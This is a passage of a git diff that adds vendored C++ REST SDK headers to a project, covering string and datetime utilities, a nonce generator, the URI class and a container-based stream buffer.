_Type(std::forward<_Arg1>(arg1))); +} + +template +std::unique_ptr<_Type> make_unique(_Arg1&& arg1, _Arg2&& arg2) +{ + return std::unique_ptr<_Type>(new _Type(std::forward<_Arg1>(arg1), std::forward<_Arg2>(arg2))); +} + +template +std::unique_ptr<_Type> make_unique(_Arg1&& arg1, _Arg2&& arg2, _Arg3&& arg3) +{ + return std::unique_ptr<_Type>( + new _Type(std::forward<_Arg1>(arg1), std::forward<_Arg2>(arg2), std::forward<_Arg3>(arg3))); +} + +template +std::unique_ptr<_Type> make_unique(_Arg1&& arg1, _Arg2&& arg2, _Arg3&& arg3, _Arg4&& arg4) +{ + return std::unique_ptr<_Type>(new _Type( + std::forward<_Arg1>(arg1), std::forward<_Arg2>(arg2), std::forward<_Arg3>(arg3), std::forward<_Arg4>(arg4))); +} + +template +std::unique_ptr<_Type> make_unique(_Arg1&& arg1, _Arg2&& arg2, _Arg3&& arg3, _Arg4&& arg4, _Arg5&& arg5) +{ + return std::unique_ptr<_Type>(new _Type(std::forward<_Arg1>(arg1), + std::forward<_Arg2>(arg2), + std::forward<_Arg3>(arg3), + std::forward<_Arg4>(arg4), + std::forward<_Arg5>(arg5))); +} + +template +std::unique_ptr<_Type> make_unique(_Arg1&& arg1, _Arg2&& arg2, _Arg3&& arg3, _Arg4&& arg4, _Arg5&& arg5, _Arg6&& arg6) +{ + return std::unique_ptr<_Type>(new _Type(std::forward<_Arg1>(arg1), + std::forward<_Arg2>(arg2), + std::forward<_Arg3>(arg3), + std::forward<_Arg4>(arg4), + std::forward<_Arg5>(arg5), + std::forward<_Arg6>(arg6))); +} + +/// +/// Cross platform utility function for performing case insensitive string equality comparison. +/// +/// First string to compare. +/// Second strong to compare. +/// true if the strings are equivalent, false otherwise +_ASYNCRTIMP bool __cdecl str_iequal(const std::string& left, const std::string& right) CPPREST_NOEXCEPT; + +/// +/// Cross platform utility function for performing case insensitive string equality comparison. +/// +/// First string to compare. +/// Second strong to compare. +/// true if the strings are equivalent, false otherwise +_ASYNCRTIMP bool __cdecl str_iequal(const std::wstring& left, const std::wstring& right) CPPREST_NOEXCEPT; + +/// +/// Cross platform utility function for performing case insensitive string less-than comparison. +/// +/// First string to compare. +/// Second strong to compare. +/// true if a lowercase view of left is lexicographically less than a lowercase view of right; otherwise, +/// false. +_ASYNCRTIMP bool __cdecl str_iless(const std::string& left, const std::string& right) CPPREST_NOEXCEPT; + +/// +/// Cross platform utility function for performing case insensitive string less-than comparison. +/// +/// First string to compare. +/// Second strong to compare. +/// true if a lowercase view of left is lexicographically less than a lowercase view of right; otherwise, +/// false. +_ASYNCRTIMP bool __cdecl str_iless(const std::wstring& left, const std::wstring& right) CPPREST_NOEXCEPT; + +/// +/// Convert a string to lowercase in place. +/// +/// The string to convert to lowercase. +_ASYNCRTIMP void __cdecl inplace_tolower(std::string& target) CPPREST_NOEXCEPT; + +/// +/// Convert a string to lowercase in place. +/// +/// The string to convert to lowercase. +_ASYNCRTIMP void __cdecl inplace_tolower(std::wstring& target) CPPREST_NOEXCEPT; + +#ifdef _WIN32 + +/// +/// Category error type for Windows OS errors. +/// +class windows_category_impl : public std::error_category +{ +public: + virtual const char* name() const CPPREST_NOEXCEPT { return "windows"; } + + virtual std::string message(int errorCode) const CPPREST_NOEXCEPT; + + virtual std::error_condition default_error_condition(int errorCode) const CPPREST_NOEXCEPT; +}; + +/// +/// Gets the one global instance of the windows error category. +/// +/// An error category instance. +_ASYNCRTIMP const std::error_category& __cdecl windows_category(); + +#else + +/// +/// Gets the one global instance of the linux error category. +/// +/// An error category instance. +_ASYNCRTIMP const std::error_category& __cdecl linux_category(); + +#endif + +/// +/// Gets the one global instance of the current platform's error category. +/// +_ASYNCRTIMP const std::error_category& __cdecl platform_category(); + +/// +/// Creates an instance of std::system_error from a OS error code. +/// +inline std::system_error __cdecl create_system_error(unsigned long errorCode) +{ + std::error_code code((int)errorCode, platform_category()); + return std::system_error(code, code.message()); +} + +/// +/// Creates a std::error_code from a OS error code. +/// +inline std::error_code __cdecl create_error_code(unsigned long errorCode) +{ + return std::error_code((int)errorCode, platform_category()); +} + +/// +/// Creates the corresponding error message from a OS error code. +/// +inline utility::string_t __cdecl create_error_message(unsigned long errorCode) +{ + return utility::conversions::to_string_t(create_error_code(errorCode).message()); +} + +} // namespace details + +class datetime +{ +public: + typedef uint64_t interval_type; + + /// + /// Defines the supported date and time string formats. + /// + enum date_format + { + RFC_1123, + ISO_8601 + }; + + /// + /// Returns the current UTC time. + /// + static _ASYNCRTIMP datetime __cdecl utc_now(); + + /// + /// An invalid UTC timestamp value. + /// + enum : interval_type + { + utc_timestamp_invalid = static_cast(-1) + }; + + /// + /// Returns seconds since Unix/POSIX time epoch at 01-01-1970 00:00:00. + /// If time is before epoch, utc_timestamp_invalid is returned. + /// + static interval_type utc_timestamp() + { + const auto seconds = utc_now().to_interval() / _secondTicks; + if (seconds >= 11644473600LL) + { + return seconds - 11644473600LL; + } + else + { + return utc_timestamp_invalid; + } + } + + datetime() : m_interval(0) {} + + /// + /// Creates datetime from a string representing time in UTC in RFC 1123 format. + /// + /// Returns a datetime of zero if not successful. + static _ASYNCRTIMP datetime __cdecl from_string(const utility::string_t& timestring, date_format format = RFC_1123); + + /// + /// Returns a string representation of the datetime. + /// + _ASYNCRTIMP utility::string_t to_string(date_format format = RFC_1123) const; + + /// + /// Returns the integral time value. + /// + interval_type to_interval() const { return m_interval; } + + datetime operator-(interval_type value) const { return datetime(m_interval - value); } + + datetime operator+(interval_type value) const { return datetime(m_interval + value); } + + bool operator==(datetime dt) const { return m_interval == dt.m_interval; } + + bool operator!=(const datetime& dt) const { return !(*this == dt); } + + static interval_type from_milliseconds(unsigned int milliseconds) { return milliseconds * _msTicks; } + + static interval_type from_seconds(unsigned int seconds) { return seconds * _secondTicks; } + + static interval_type from_minutes(unsigned int minutes) { return minutes * _minuteTicks; } + + static interval_type from_hours(unsigned int hours) { return hours * _hourTicks; } + + static interval_type from_days(unsigned int days) { return days * _dayTicks; } + + bool is_initialized() const { return m_interval != 0; } + +private: + friend int operator-(datetime t1, datetime t2); + + static const interval_type _msTicks = static_cast(10000); + static const interval_type _secondTicks = 1000 * _msTicks; + static const interval_type _minuteTicks = 60 * _secondTicks; + static const interval_type _hourTicks = 60 * 60 * _secondTicks; + static const interval_type _dayTicks = 24 * 60 * 60 * _secondTicks; + + // Private constructor. Use static methods to create an instance. + datetime(interval_type interval) : m_interval(interval) {} + + // Storing as hundreds of nanoseconds 10e-7, i.e. 1 here equals 100ns. + interval_type m_interval; +}; + +inline int operator-(datetime t1, datetime t2) +{ + auto diff = (t1.m_interval - t2.m_interval); + + // Round it down to seconds + diff /= 10 * 1000 * 1000; + + return static_cast(diff); +} + +/// +/// Nonce string generator class. +/// +class nonce_generator +{ +public: + /// + /// Define default nonce length. + /// + enum + { + default_length = 32 + }; + + /// + /// Nonce generator constructor. + /// + /// Length of the generated nonce string. + nonce_generator(int length = default_length) + : m_random(static_cast(utility::datetime::utc_timestamp())), m_length(length) + { + } + + /// + /// Generate a nonce string containing random alphanumeric characters (A-Za-z0-9). + /// Length of the generated string is set by length(). + /// + /// The generated nonce string. + _ASYNCRTIMP utility::string_t generate(); + + /// + /// Get length of generated nonce string. + /// + /// Nonce string length. + int length() const { return m_length; } + + /// + /// Set length of the generated nonce string. + /// + /// Lenght of nonce string. + void set_length(int length) { m_length = length; } + +private: + std::mt19937 m_random; + int m_length; +}; + +} // namespace utility diff --git a/Src/Common/CppRestSdk/include/cpprest/base_uri.h b/Src/Common/CppRestSdk/include/cpprest/base_uri.h new file mode 100644 index 0000000..80ebb5e --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/base_uri.h @@ -0,0 +1,391 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Protocol independent support for URIs. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#include "Common/CppRestSdk/include/cpprest/asyncrt_utils.h" +#include "Common/CppRestSdk/include/cpprest/details/basic_types.h" +#include +#include +#include +#include + +namespace web +{ +namespace details +{ +struct uri_components +{ + uri_components() : m_path(_XPLATSTR("/")), m_port(-1) {} + + uri_components(const uri_components&) = default; + uri_components& operator=(const uri_components&) = default; + + // This is for VS2013 compatibility -- replace with '= default' when VS2013 is completely dropped. + uri_components(uri_components&& other) CPPREST_NOEXCEPT : m_scheme(std::move(other.m_scheme)), + m_host(std::move(other.m_host)), + m_user_info(std::move(other.m_user_info)), + m_path(std::move(other.m_path)), + m_query(std::move(other.m_query)), + m_fragment(std::move(other.m_fragment)), + m_port(other.m_port) + { + } + + // This is for VS2013 compatibility -- replace with '= default' when VS2013 is completely dropped. + uri_components& operator=(uri_components&& other) CPPREST_NOEXCEPT + { + if (this != &other) + { + m_scheme = std::move(other.m_scheme); + m_host = std::move(other.m_host); + m_user_info = std::move(other.m_user_info); + m_path = std::move(other.m_path); + m_query = std::move(other.m_query); + m_fragment = std::move(other.m_fragment); + m_port = other.m_port; + } + return *this; + } + + _ASYNCRTIMP utility::string_t join(); + + utility::string_t m_scheme; + utility::string_t m_host; + utility::string_t m_user_info; + utility::string_t m_path; + utility::string_t m_query; + utility::string_t m_fragment; + int m_port; +}; +} // namespace details + +/// +/// A single exception type to represent errors in parsing, encoding, and decoding URIs. +/// +class uri_exception : public std::exception +{ +public: + uri_exception(std::string msg) : m_msg(std::move(msg)) {} + + ~uri_exception() CPPREST_NOEXCEPT {} + + const char* what() const CPPREST_NOEXCEPT { return m_msg.c_str(); } + +private: + std::string m_msg; +}; + +/// +/// A flexible, protocol independent URI implementation. +/// +/// URI instances are immutable. Querying the various fields on an empty URI will return empty strings. Querying +/// various diagnostic members on an empty URI will return false. +/// +/// +/// This implementation accepts both URIs ('http://msn.com/path') and URI relative-references +/// ('/path?query#frag'). +/// +/// This implementation does not provide any scheme-specific handling -- an example of this +/// would be the following: 'http://path1/path'. This is a valid URI, but it's not a valid +/// http-uri -- that is, it's syntactically correct but does not conform to the requirements +/// of the http scheme (http requires a host). +/// We could provide this by allowing a pluggable 'scheme' policy-class, which would provide +/// extra capability for validating and canonicalizing a URI according to scheme, and would +/// introduce a layer of type-safety for URIs of differing schemes, and thus differing semantics. +/// +/// One issue with implementing a scheme-independent URI facility is that of comparing for equality. +/// For instance, these URIs are considered equal 'http://msn.com', 'http://msn.com:80'. That is -- +/// the 'default' port can be either omitted or explicit. Since we don't have a way to map a scheme +/// to it's default port, we don't have a way to know these are equal. This is just one of a class of +/// issues with regard to scheme-specific behavior. +/// +class uri +{ +public: + /// + /// The various components of a URI. This enum is used to indicate which + /// URI component is being encoded to the encode_uri_component. This allows + /// specific encoding to be performed. + /// + /// Scheme and port don't allow '%' so they don't need to be encoded. + /// + class components + { + public: + enum component + { + user_info, + host, + path, + query, + fragment, + full_uri + }; + }; + + /// + /// Encodes a URI component according to RFC 3986. + /// Note if a full URI is specified instead of an individual URI component all + /// characters not in the unreserved set are escaped. + /// + /// The URI as a string. + /// The encoded string. + _ASYNCRTIMP static utility::string_t __cdecl encode_uri(const utility::string_t& raw, + uri::components::component = components::full_uri); + + /// + /// Encodes a string by converting all characters except for RFC 3986 unreserved characters to their + /// hexadecimal representation. + /// + /// The encoded string. + _ASYNCRTIMP static utility::string_t __cdecl encode_data_string(const utility::string_t& data); + + /// + /// Decodes an encoded string. + /// + /// The URI as a string. + /// The decoded string. + _ASYNCRTIMP static utility::string_t __cdecl decode(const utility::string_t& encoded); + + /// + /// Splits a path into its hierarchical components. + /// + /// The path as a string + /// A std::vector<utility::string_t> containing the segments in the path. + _ASYNCRTIMP static std::vector __cdecl split_path(const utility::string_t& path); + + /// + /// Splits a query into its key-value components. + /// + /// The query string + /// A std::map<utility::string_t, utility::string_t> containing the key-value components of + /// the query. + _ASYNCRTIMP static std::map __cdecl split_query( + const utility::string_t& query); + + /// + /// Validates a string as a URI. + /// + /// + /// This function accepts both uris ('http://msn.com') and uri relative-references ('path1/path2?query'). + /// + /// The URI string to be validated. + /// true if the given string represents a valid URI, false otherwise. + _ASYNCRTIMP static bool __cdecl validate(const utility::string_t& uri_string); + + /// + /// Creates an empty uri + /// + uri() : m_uri(_XPLATSTR("/")) {} + + /// + /// Creates a URI from the given encoded string. This will throw an exception if the string + /// does not contain a valid URI. Use uri::validate if processing user-input. + /// + /// A pointer to an encoded string to create the URI instance. + _ASYNCRTIMP uri(const utility::char_t* uri_string); + + /// + /// Creates a URI from the given encoded string. This will throw an exception if the string + /// does not contain a valid URI. Use uri::validate if processing user-input. + /// + /// An encoded URI string to create the URI instance. + _ASYNCRTIMP uri(const utility::string_t& uri_string); + + /// + /// Copy constructor. + /// + uri(const uri&) = default; + + /// + /// Copy assignment operator. + /// + uri& operator=(const uri&) = default; + + /// + /// Move constructor. + /// + // This is for VS2013 compatibility -- replace with '= default' when VS2013 is completely dropped. + uri(uri&& other) CPPREST_NOEXCEPT : m_uri(std::move(other.m_uri)), m_components(std::move(other.m_components)) {} + + /// + /// Move assignment operator + /// + // This is for VS2013 compatibility -- replace with '= default' when VS2013 is completely dropped. + uri& operator=(uri&& other) CPPREST_NOEXCEPT + { + if (this != &other) + { + m_uri = std::move(other.m_uri); + m_components = std::move(other.m_components); + } + return *this; + } + + /// + /// Get the scheme component of the URI as an encoded string. + /// + /// The URI scheme as a string. + const utility::string_t& scheme() const { return m_components.m_scheme; } + + /// + /// Get the user information component of the URI as an encoded string. + /// + /// The URI user information as a string. + const utility::string_t& user_info() const { return m_components.m_user_info; } + + /// + /// Get the host component of the URI as an encoded string. + /// + /// The URI host as a string. + const utility::string_t& host() const { return m_components.m_host; } + + /// + /// Get the port component of the URI. Returns -1 if no port is specified. + /// + /// The URI port as an integer. + int port() const { return m_components.m_port; } + + /// + /// Get the path component of the URI as an encoded string. + /// + /// The URI path as a string. + const utility::string_t& path() const { return m_components.m_path; } + + /// + /// Get the query component of the URI as an encoded string. + /// + /// The URI query as a string. + const utility::string_t& query() const { return m_components.m_query; } + + /// + /// Get the fragment component of the URI as an encoded string. + /// + /// The URI fragment as a string. + const utility::string_t& fragment() const { return m_components.m_fragment; } + + /// + /// Creates a new uri object with the same authority portion as this one, omitting the resource and query portions. + /// + /// The new uri object with the same authority. + _ASYNCRTIMP uri authority() const; + + /// + /// Gets the path, query, and fragment portion of this uri, which may be empty. + /// + /// The new URI object with the path, query and fragment portion of this URI. + _ASYNCRTIMP uri resource() const; + + /// + /// An empty URI specifies no components, and serves as a default value + /// + bool is_empty() const { return this->m_uri.empty() || this->m_uri == _XPLATSTR("/"); } + + /// + /// A loopback URI is one which refers to a hostname or ip address with meaning only on the local machine. + /// + /// + /// Examples include "localhost", or ip addresses in the loopback range (127.0.0.0/24). + /// + /// true if this URI references the local host, false otherwise. + bool is_host_loopback() const + { + return !is_empty() && + ((host() == _XPLATSTR("localhost")) || (host().size() > 4 && host().substr(0, 4) == _XPLATSTR("127."))); + } + + /// + /// A wildcard URI is one which refers to all hostnames that resolve to the local machine (using the * or +) + /// + /// + /// http://*:80 + /// + bool is_host_wildcard() const + { + return !is_empty() && (this->host() == _XPLATSTR("*") || this->host() == _XPLATSTR("+")); + } + + /// + /// A portable URI is one with a hostname that can be resolved globally (used from another machine). + /// + /// true if this URI can be resolved globally (used from another machine), false + /// otherwise. The hostname "localhost" is a reserved name that is guaranteed to resolve to the + /// local machine, and cannot be used for inter-machine communication. Likewise the hostnames "*" and "+" on Windows + /// represent wildcards, and do not map to a resolvable address. + /// + bool is_host_portable() const { return !(is_empty() || is_host_loopback() || is_host_wildcard()); } + + /// + /// A default port is one where the port is unspecified, and will be determined by the operating system. + /// The choice of default port may be dictated by the scheme (http -> 80) or not. + /// + /// true if this URI instance has a default port, false otherwise. + bool is_port_default() const { return !is_empty() && this->port() == 0; } + + /// + /// An "authority" URI is one with only a scheme, optional userinfo, hostname, and (optional) port. + /// + /// true if this is an "authority" URI, false otherwise. + bool is_authority() const { return !is_empty() && is_path_empty() && query().empty() && fragment().empty(); } + + /// + /// Returns whether the other URI has the same authority as this one + /// + /// The URI to compare the authority with. + /// true if both the URI's have the same authority, false otherwise. + bool has_same_authority(const uri& other) const { return !is_empty() && this->authority() == other.authority(); } + + /// + /// Returns whether the path portion of this URI is empty + /// + /// true if the path portion of this URI is empty, false otherwise. + bool is_path_empty() const { return path().empty() || path() == _XPLATSTR("/"); } + + /// + /// Returns the full (encoded) URI as a string. + /// + /// The full encoded URI string. + utility::string_t to_string() const { return m_uri; } + + /// + /// Returns an URI resolved against this as the base URI + /// according to RFC3986, Section 5 (https://tools.ietf.org/html/rfc3986#section-5). + /// + /// The relative URI to be resolved against this as base. + /// The new resolved URI string. + _ASYNCRTIMP utility::string_t resolve_uri(const utility::string_t& relativeUri) const; + + _ASYNCRTIMP bool operator==(const uri& other) const; + + bool operator<(const uri& other) const { return m_uri < other.m_uri; } + + bool operator!=(const uri& other) const { return !(this->operator==(other)); } + +private: + friend class uri_builder; + + /// + /// Creates a URI from the given URI components. + /// + /// A URI components object to create the URI instance. + _ASYNCRTIMP uri(const details::uri_components& components); + + // Used by uri_builder + static utility::string_t __cdecl encode_query_impl(const utf8string& raw); + + utility::string_t m_uri; + details::uri_components m_components; +}; + +} // namespace web diff --git a/Src/Common/CppRestSdk/include/cpprest/containerstream.h b/Src/Common/CppRestSdk/include/cpprest/containerstream.h new file mode 100644 index 0000000..72bd7ca --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/containerstream.h @@ -0,0 +1,590 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * This file defines a basic STL-container-based stream buffer. Reading from the buffer will not remove any data + * from it and seeking is thus supported. + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#include "Common/CppRestSdk/include/cpprest/astreambuf.h" +#include "Common/CppRestSdk/include/cpprest/streams.h" +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" +#include +#include +#include +#include + +namespace Concurrency +{ +namespace streams +{ +// Forward declarations + +template +class container_buffer; + +namespace details +{ +/// +/// The basic_container_buffer class serves as a memory-based steam buffer that supports writing or reading +/// sequences of characters. +/// The class itself should not be used in application code, it is used by the stream definitions farther down in the +/// header file. +/// +/// When closed, neither writing nor reading is supported any longer. basic_container_buffer does not +/// support simultaneous use of the buffer for reading and writing. +template +class basic_container_buffer : public streams::details::streambuf_state_manager +{ +public: + typedef typename _CollectionType::value_type _CharType; + typedef typename basic_streambuf<_CharType>::traits traits; + typedef typename basic_streambuf<_CharType>::int_type int_type; + typedef typename basic_streambuf<_CharType>::pos_type pos_type; + typedef typename basic_streambuf<_CharType>::off_type off_type; + + /// + /// Returns the underlying data container + /// + _CollectionType& collection() { return m_data; } + + /// + /// Destructor + /// + virtual ~basic_container_buffer() + { + // Invoke the synchronous versions since we need to + // purge the request queue before deleting the buffer + this->_close_read(); + this->_close_write(); + } + +protected: + /// + /// can_seek is used to determine whether a stream buffer supports seeking. + /// + virtual bool can_seek() const { return this->is_open(); } + + /// + /// has_size is used to determine whether a stream buffer supports size(). + /// + virtual bool has_size() const { return this->is_open(); } + + /// + /// Gets the size of the stream, if known. Calls to has_size will determine whether + /// the result of size can be relied on. + /// + virtual utility::size64_t size() const { return utility::size64_t(m_data.size()); } + + /// + /// Get the stream buffer size, if one has been set. + /// + /// The direction of buffering (in or out) + /// An implementation that does not support buffering will always return '0'. + virtual size_t buffer_size(std::ios_base::openmode = std::ios_base::in) const { return 0; } + + /// + /// Sets the stream buffer implementation to buffer or not buffer. + /// + /// The size to use for internal buffering, 0 if no buffering should be done. + /// The direction of buffering (in or out) + /// An implementation that does not support buffering will silently ignore calls to this function and it + /// will not have any effect on what is returned by subsequent calls to . + virtual void set_buffer_size(size_t, std::ios_base::openmode = std::ios_base::in) { return; } + + /// + /// For any input stream, in_avail returns the number of characters that are immediately available + /// to be consumed without blocking. May be used in conjunction with to read data without + /// incurring the overhead of using tasks. + /// + virtual size_t in_avail() const + { + // See the comment in seek around the restriction that we do not allow read head to + // seek beyond the current write_end. + _ASSERTE(m_current_position <= m_data.size()); + + msl::safeint3::SafeInt readhead(m_current_position); + msl::safeint3::SafeInt writeend(m_data.size()); + return (size_t)(writeend - readhead); + } + + virtual pplx::task _sync() { return pplx::task_from_result(true); } + + virtual pplx::task _putc(_CharType ch) + { + int_type retVal = (this->write(&ch, 1) == 1) ? static_cast(ch) : traits::eof(); + return pplx::task_from_result(retVal); + } + + virtual pplx::task _putn(const _CharType* ptr, size_t count) + { + return pplx::task_from_result(this->write(ptr, count)); + } + + /// + /// Allocates a contiguous memory block and returns it. + /// + /// The number of characters to allocate. + /// A pointer to a block to write to, null if the stream buffer implementation does not support + /// alloc/commit. + _CharType* _alloc(size_t count) + { + if (!this->can_write()) return nullptr; + + // Allocate space + resize_for_write(m_current_position + count); + + // Let the caller copy the data + return (_CharType*)&m_data[m_current_position]; + } + + /// + /// Submits a block already allocated by the stream buffer. + /// + /// The number of characters to be committed. + void _commit(size_t actual) + { + // Update the write position and satisfy any pending reads + update_current_position(m_current_position + actual); + } + + /// + /// Gets a pointer to the next already allocated contiguous block of data. + /// + /// A reference to a pointer variable that will hold the address of the block on success. + /// The number of contiguous characters available at the address in 'ptr'. + /// true if the operation succeeded, false otherwise. + /// + /// A return of false does not necessarily indicate that a subsequent read operation would fail, only that + /// there is no block to return immediately or that the stream buffer does not support the operation. + /// The stream buffer may not de-allocate the block until is called. + /// If the end of the stream is reached, the function will return true, a null pointer, and a count of zero; + /// a subsequent read will not succeed. + /// + virtual bool acquire(_Out_ _CharType*& ptr, _Out_ size_t& count) + { + ptr = nullptr; + count = 0; + + if (!this->can_read()) return false; + + count = in_avail(); + + if (count > 0) + { + ptr = (_CharType*)&m_data[m_current_position]; + return true; + } + else + { + // Can only be open for read OR write, not both. If there is no data then + // we have reached the end of the stream so indicate such with true. + return true; + } + } + + /// + /// Releases a block of data acquired using . This frees the stream buffer to + /// de-allocate the memory, if it so desires. Move the read position ahead by the count. + /// + /// A pointer to the block of data to be released. + /// The number of characters that were read. + virtual void release(_Out_writes_opt_(count) _CharType* ptr, _In_ size_t count) + { + if (ptr != nullptr) update_current_position(m_current_position + count); + } + + virtual pplx::task _getn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + return pplx::task_from_result(this->read(ptr, count)); + } + + size_t _sgetn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) { return this->read(ptr, count); } + + virtual size_t _scopy(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + return this->read(ptr, count, false); + } + + virtual pplx::task _bumpc() { return pplx::task_from_result(this->read_byte(true)); } + + virtual int_type _sbumpc() { return this->read_byte(true); } + + virtual pplx::task _getc() { return pplx::task_from_result(this->read_byte(false)); } + + int_type _sgetc() { return this->read_byte(false); } + + virtual pplx::task _nextc() + { + this->read_byte(true); + return pplx::task_from_result(this->read_byte(false)); + } + + virtual pplx::task _ungetc() + { + auto pos = seekoff(-1, std::ios_base::cur, std::ios_base::in); + if (pos == (pos_type)traits::eof()) return pplx::task_from_result(traits::eof()); + return this->getc(); + } + + /// + /// Gets the current read or write position in the stream. + /// + /// The I/O direction to seek (see remarks) + /// The current position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the direction parameter defines whether to move the read or the write + /// cursor. + virtual pos_type getpos(std::ios_base::openmode mode) const + { + if (((mode & std::ios_base::in) && !this->can_read()) || ((mode & std::ios_base::out) && !this->can_write())) + return static_cast(traits::eof()); + + return static_cast(m_current_position); + } + + /// + /// Seeks to the given position. + /// + /// The offset from the beginning of the stream. + /// The I/O direction to seek (see remarks). + /// The position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. For such streams, the direction parameter + /// defines whether to move the read or the write cursor. + virtual pos_type seekpos(pos_type position, std::ios_base::openmode mode) + { + pos_type beg(0); + + // In order to support relative seeking from the end position we need to fix an end position. + // Technically, there is no end for the stream buffer as new writes would just expand the buffer. + // For now, we assume that the current write_end is the end of the buffer. We use this artificial + // end to restrict the read head from seeking beyond what is available. + + pos_type end(m_data.size()); + + if (position >= beg) + { + auto pos = static_cast(position); + + // Read head + if ((mode & std::ios_base::in) && this->can_read()) + { + if (position <= end) + { + // We do not allow reads to seek beyond the end or before the start position. + update_current_position(pos); + return static_cast(m_current_position); + } + } + + // Write head + if ((mode & std::ios_base::out) && this->can_write()) + { + // Allocate space + resize_for_write(pos); + + // Nothing to really copy + + // Update write head and satisfy read requests if any + update_current_position(pos); + + return static_cast(m_current_position); + } + } + + return static_cast(traits::eof()); + } + + /// + /// Seeks to a position given by a relative offset. + /// + /// The relative position to seek to + /// The starting point (beginning, end, current) for the seek. + /// The I/O direction to seek (see remarks) + /// The position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the mode parameter defines whether to move the read or the write cursor. + virtual pos_type seekoff(off_type offset, std::ios_base::seekdir way, std::ios_base::openmode mode) + { + pos_type beg = 0; + pos_type cur = static_cast(m_current_position); + pos_type end = static_cast(m_data.size()); + + switch (way) + { + case std::ios_base::beg: return seekpos(beg + offset, mode); + + case std::ios_base::cur: return seekpos(cur + offset, mode); + + case std::ios_base::end: return seekpos(end + offset, mode); + + default: return static_cast(traits::eof()); + } + } + +private: + template + friend class streams::container_buffer; + + /// + /// Constructor + /// + basic_container_buffer(std::ios_base::openmode mode) + : streambuf_state_manager(mode), m_current_position(0) + { + validate_mode(mode); + } + + /// + /// Constructor + /// + basic_container_buffer(_CollectionType data, std::ios_base::openmode mode) + : streambuf_state_manager(mode) + , m_data(std::move(data)) + , m_current_position((mode & std::ios_base::in) ? 0 : m_data.size()) + { + validate_mode(mode); + } + + static void validate_mode(std::ios_base::openmode mode) + { + // Disallow simultaneous use of the stream buffer for writing and reading. + if ((mode & std::ios_base::in) && (mode & std::ios_base::out)) + throw std::invalid_argument("this combination of modes on container stream not supported"); + } + + /// + /// Determine if the request can be satisfied. + /// + bool can_satisfy(size_t) + { + // We can always satisfy a read, at least partially, unless the + // read position is at the very end of the buffer. + return (in_avail() > 0); + } + + /// + /// Reads a byte from the stream and returns it as int_type. + /// Note: This routine shall only be called if can_satisfy() returned true. + /// + int_type read_byte(bool advance = true) + { + _CharType value; + auto read_size = this->read(&value, 1, advance); + return read_size == 1 ? static_cast(value) : traits::eof(); + } + + /// + /// Reads up to count characters into ptr and returns the count of characters copied. + /// The return value (actual characters copied) could be <= count. + /// Note: This routine shall only be called if can_satisfy() returned true. + /// + size_t read(_Out_writes_(count) _CharType* ptr, _In_ size_t count, bool advance = true) + { + if (!can_satisfy(count)) return 0; + + msl::safeint3::SafeInt request_size(count); + msl::safeint3::SafeInt read_size = request_size.Min(in_avail()); + + size_t newPos = m_current_position + read_size; + + auto readBegin = std::begin(m_data) + m_current_position; + auto readEnd = std::begin(m_data) + newPos; + +#if defined(_ITERATOR_DEBUG_LEVEL) && _ITERATOR_DEBUG_LEVEL != 0 + // Avoid warning C4996: Use checked iterators under SECURE_SCL + std::copy(readBegin, readEnd, stdext::checked_array_iterator<_CharType*>(ptr, count)); +#else + std::copy(readBegin, readEnd, ptr); +#endif // _WIN32 + + if (advance) + { + update_current_position(newPos); + } + + return (size_t)read_size; + } + + /// + /// Write count characters from the ptr into the stream buffer + /// + size_t write(const _CharType* ptr, size_t count) + { + if (!this->can_write() || (count == 0)) return 0; + + auto newSize = m_current_position + count; + + // Allocate space + resize_for_write(newSize); + + // Copy the data + std::copy(ptr, ptr + count, std::begin(m_data) + m_current_position); + + // Update write head and satisfy pending reads if any + update_current_position(newSize); + + return count; + } + + /// + /// Resize the underlying container to match the new write head + /// + void resize_for_write(size_t newPos) + { + // Resize the container if required + if (newPos > m_data.size()) + { + m_data.resize(newPos); + } + } + + /// + /// Updates the write head to the new position + /// + void update_current_position(size_t newPos) + { + // The new write head + m_current_position = newPos; + _ASSERTE(m_current_position <= m_data.size()); + } + + // The actual data store + _CollectionType m_data; + + // Read/write head + size_t m_current_position; +}; + +} // namespace details + +/// +/// The basic_container_buffer class serves as a memory-based steam buffer that supports writing or reading +/// sequences of characters. Note that it cannot be used as a consumer producer buffer. +/// +/// +/// The type of the container. +/// +/// +/// This is a reference-counted version of basic_container_buffer. +/// +template +class container_buffer : public streambuf +{ +public: + typedef typename _CollectionType::value_type char_type; + + /// + /// Creates a container_buffer given a collection, copying its data into the buffer. + /// + /// The collection that is the starting point for the buffer + /// The I/O mode that the buffer should use (in / out) + container_buffer(_CollectionType data, std::ios_base::openmode mode = std::ios_base::in) + : streambuf( + std::shared_ptr>( + new streams::details::basic_container_buffer<_CollectionType>(std::move(data), mode))) + { + } + + /// + /// Creates a container_buffer starting from an empty collection. + /// + /// The I/O mode that the buffer should use (in / out) + 